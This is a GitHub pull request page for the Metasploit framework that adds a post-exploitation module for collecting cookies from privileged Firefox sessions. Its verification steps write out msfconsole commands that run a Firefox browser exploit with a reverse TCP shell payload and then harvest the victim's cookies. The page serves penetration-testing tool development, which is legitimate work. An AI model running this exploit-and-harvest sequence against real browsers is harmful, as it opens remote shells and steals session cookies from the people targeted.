Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add cookie gathering post module for FF privileged sessions. #3146

Merged
merged 3 commits into from Mar 27, 2014

Conversation

jvennix-r7
Copy link
Contributor

Verification:

msf> use exploit/multi/browser/firefox_svg_plugin
msf> set payload firefox/shell_reverse_tcp
msf> set LHOST 0.0.0.0
msf> run
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:59457) at 2014-03-26 13:51:32 -0500
  • Run the post/firefox/gather/cookies module against the session, ensure you collect some cookies:
msf> use post/firefox/gather/cookies
msf> set SESSION 1
msf> run
[+] Saved 26 cookies to ....

@wchen-r7 wchen-r7 self-assigned this Mar 27, 2014
@wchen-r7 wchen-r7 merged commit b7f1cee into rapid7:master Mar 27, 2014
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet

3 participants